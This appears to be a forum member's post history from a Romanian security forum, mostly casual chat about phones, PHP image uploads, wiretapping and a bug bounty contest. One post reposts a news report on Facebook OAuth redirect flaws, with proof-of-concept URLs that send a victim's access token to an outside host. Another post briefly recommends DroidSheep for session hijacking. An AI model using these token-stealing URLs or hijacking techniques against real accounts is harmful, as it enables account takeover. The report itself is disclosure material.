Jump to content

Cheater

Active Members
  • Posts

    1534
  • Joined

  • Last visited

  • Days Won

    17

Everything posted by Cheater

  1. Play and win! Nice job!
  2. Daca faci prosti pe net trebuie curatat si cablul de retea cu smirghelul apoi lasat 1-2h in acid azotic sa se duca toate urmele )
  3. Ai ceva background pe telecomunicatii? sau ai tras ceva, esti bine?
  4. Bravo, daca ai inceput de acum, ai o aptitudine pt asta, si poate peste cativa ani vedem si noi un remi gaillard de romania, sau cineva ce o sa duca numele tarii mai departe, inca un + pe scena internationala.
  5. In earlier posts, our Facebook hacker 'Nir Goldshlager' exposed two serious Facebook oAuth Flaws. One, Hacking a Facebook account even without the user installing an application on their account and second, various ways to bypassing the regex protection in Facebook OAuth. This time, Nir illustrated a scenario attack "what happens when a application is installed on the victim’s account and how an attacker can manipulate it so easily" According to hacker, if the victim has an installed application like Skype or Dropbox, still hacker is able to take control over their accounts. For this, an attacker required only a url redirection or cross site scripting vulnerability on the Facebook owner app domain i.e in this scenario we are talking about skype facebook app. In many bug bounty programs URL redirection is not considered as an valid vulnerability for reward i.e Google Bug bounty Program. Nir also demonstrated that an attacker is even able to gain knowledge of which application their victims are using. Example url : https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m Because Facebook applications are developed by 3rd Party developers, who actually own the app, so facebook was helpless when to fix such potentially pernicious site redirection attacks. Continuing hacking method used in last two oAuth flaws (mentioned here), this time attack is trying to use app redirection flaw in “redirect_uri, next” parameter to steal the access_token of facebook users. POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1 POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1 The purpose of the hacker is just to steal the victim’s access_token through the use of Facebook OAuth flaws, so that he can take full control over victim's account remotely without knowing their passwords. Note: Flaw was reported to Facebook security team by Nir Goldshlager and but can't be fixed by Facebook team itself. Because app developers are responsible for aap programming mistakes, so issue is still unfix for other million apps. SURSA: URL Redirection flaw in Facebook apps push OAuth vulnerability again in action - Hacking News
  6. Cu siguranta nu prin ping... Nu mai faceti offtopic!....WARN!
  7. Scriptul tau ar trebui sa fie in felul urmator: 1. urci o poza, o redimensionezi la 1/2 rezolutii cum ai nevoie, o denumesti dupa numele ce il introduce userul in admin in locatia fizica ce ti-o alegi. 2. la alegerea numelui pozei, verifici cu ajax daca numele exista, si afisezi de asemenea verifici din php la upload 3. scri intr-un tabel id uni al pozei, numele, si id produsului 4. In admin faci o afisare similara cu cea din frontend, dar inserezi link de stergere ce contine id pozei. La afisare citesti din tabel toate pozele ce apartin prod, cu id, respectiv, ordonate dupa id, suplimentar poti face si o coloana cu nr de ordine sa poata sa le ordoneze custom. Practic din db, citesti numele cu care ai redenumit poza, si la afisare construiesti tagul incluzand locatia unde o salveaza. Cam asta trebuie tu sa scri acolo, vezi ce pas din astia ai omis, probabil daia nu merge, sau de multe ori ca sa iti fie mai usor nu o scri de ex in db, dupaia iti dai seama ca nu-i. Mai poti avea probleme la upload din cauza functiei de redimensionare, de obicei se foloseste GD pt asta, vezi ca php sa aibe modulul. Astfle daca extensia e jpg sa zicem si tu o validezi, apoi faci redimensionare pt jpg, dar poza e de fapt png nu iti va merge.
  8. + frecventa sare dupa un algoritm ce este schimbat la inceputul apelului
  9. Ce trebuie sa fac? Gasesti una sau mai multe vulnerabilitati exploatabile pe https://www.rotunneling.net/ , le raportezi la support@rotunneling.net si RedShift IT SRL iti va scrie o scrisoare de recomandare, oficiala, semnata si stampilata ce iti atesteaza cunostiintele si o poti folosi in CV, interviuri, conferinte oficiale. Conditii de participare: Procedura de inscriere este simpla: 1. Intri pe siteul RoTunneling.Net . 2. Gasesti una sau mai multe vulnerabilitati exploatabile. 3. Scri o recenzie, intre 70 si 400 caractere. 4. O trimiti pe mailul support@rotunneling.net in care mentionezi numele tau. - fiecare concurent poate avea mai multe recenzii cu care participa. - pentru ca un concurent sa se inscrie cu mai multe recenzii, cu fiecare trebuie sa urmeze pasi 1-6 de mai sus. Perioada de desfasurare: Campania se desfasoara intre 26.03.2013 si 26.04.2013. Cum validam recenziile de securitate informatica? Vom valida fiecare inscriere in termen de 48 ore de la primirea mailului pe support@rotunneling.net, confirmand sau infirmand in acest termen respectarea conditiilor de participare prin mail. Jurizarea se va face de catre unul din reprezentantii RedShift IT S.R.L. ce va avea in vedere: - originalitate; - creativitate; - relevanta; - corectitudinea informatiilor. - nu luam in considerare rezultarele scannerelor, sunt valide doar vulnerabilitatiile gasite cu scripturi/tooluri proprii, respectiv manual. - atacurile de tip ddos, flood, nu sunt luate in considerare. Premiul: RedShift IT SRL iti va scrie o scrisoare de recomandare, semnata si stampilata, oficial, ce iti atesta cunostiintele ce o poti folosi in CV, conferinte, interviuri respectiv oricunde ai nevoie. Vor fi declarate castigatorare recenziile cu cel mai mare scor general, castigatorii vor fi anuntati in maxim 3 zile lucratoare de la jurizare pe siteul https://www.rotunneling.net/ si pagina de facebook https://www.facebook.com/RoTunneling . Cele mai bune recenzii vor fi afisate pe siteul https://www.rotunneling.net/ impreuna cu numele concurentului, iar prin participarea la acest concurs, concurentii isi dau acordul explicit pentru aceasta. Vulnerabilitatiile nu pot fi facute publice fara acordul explicit RedShift IT SRL, in functie de vulnerabilitate vom da curs cererilor de publicare, daca este cazul, dupa ce acestea sunt reparate. Mult succes! Echipa RoTunneling.Net Sursa: https://www.rotunneling.net/articole/rotunneling-vpn-organizeaza-primul-concurs-pentru-hackeri/
  10. ptiu, pe cand ma bucuram ca in loc de hackeri le-a zis mai corect, falsificatori, dau de: Eh in timp speram sa invete...
  11. Ce-i prostia asta...hai sa lamurim o chestie; STS/SRI, inregistreaza toate apelurile din Romania, toate, indiferent de persoana and stuff. Iar cand se asculta se asculta din inregistrari persoanele targetate, deci local, astfel nu o sa iti dai seama neam dupa sunete sau alte prosti, poate era o chestie acum 100 de ani cand erau centrale dalea, de ca sa suni la cineva trebuia sa ceri centralistei si iti facea legatura.
  12. Htx one x +, vine cu casti beatsaudio, si are integrat un soft special de a optimiza sunetul pt aceste casti. Alternativ poti sa iti iei orice htc ce are beatsaudio, si casti separat, casti bune sunt pe la 300 euro, dar merita.
  13. Nu, si l-as raporta la adminul de retea sau unde e cazu. Dar 90% din angajati, inspecial cei ce nu au o pasiune pt it cu siguranta ar da.
  14. Contesta amenta in instanta si mergi mai departe!
  15. Te-ai laudat degeaba; php si javascript = scripting html = markup language css = style sheet language mysql = baza de date Din care nici unul nu are vreo treaba cu programarea, nu este limbaj de programare. Vezi ce sunt alea de dupa egal pe wikipedia, sa nu te mai faci de ras alta data. Welcome!
  16. In Bucuresti, intre Universitate si Kogalniceanu, era un tip acum cativa ani care facea aceeasi chestie, m-a acostat de vreo 2-3 ori dar nu i-am dat prea mare importanta inselatoriei, evident nici nu m-am lasat inselat. Funny a fost ca ultima data l-am intalnit la Unirii incerca sa imi vanda nuj ce bilete la un concert, de data asta in romana, atunci i-am si batut obrazul.
  17. RNS in varianta siriana, numai ca sirieni pare-se ca sunt Script kiddie, de nici un deface politic nu stiu sa dea.
  18. Un experiment asemanator a fost facut si in Bucuresti la Cocor. Un violonist de renume canta la Stradivarius, interesant a fost ca uni din trecatori si-au dat seama ca nu este un simplu 'muzician'
  19. Root + Droidsheep, pe tabletele cu android si face mim, de deturnezi sesiunea.
  20. Na belea, si eu ma bucurasem ca mi-am criptat telefonul.... Deci trb sa fi pe faza ca la pc, sa fie oprit la nevoie.
  21. Felicitari pt initiativa! Daca faceti la fac oracle, fiti atenti ca va prinde bine! In enterprise se lcreaza in mod deosebit cu el sau u mssql.
×
×
  • Create New...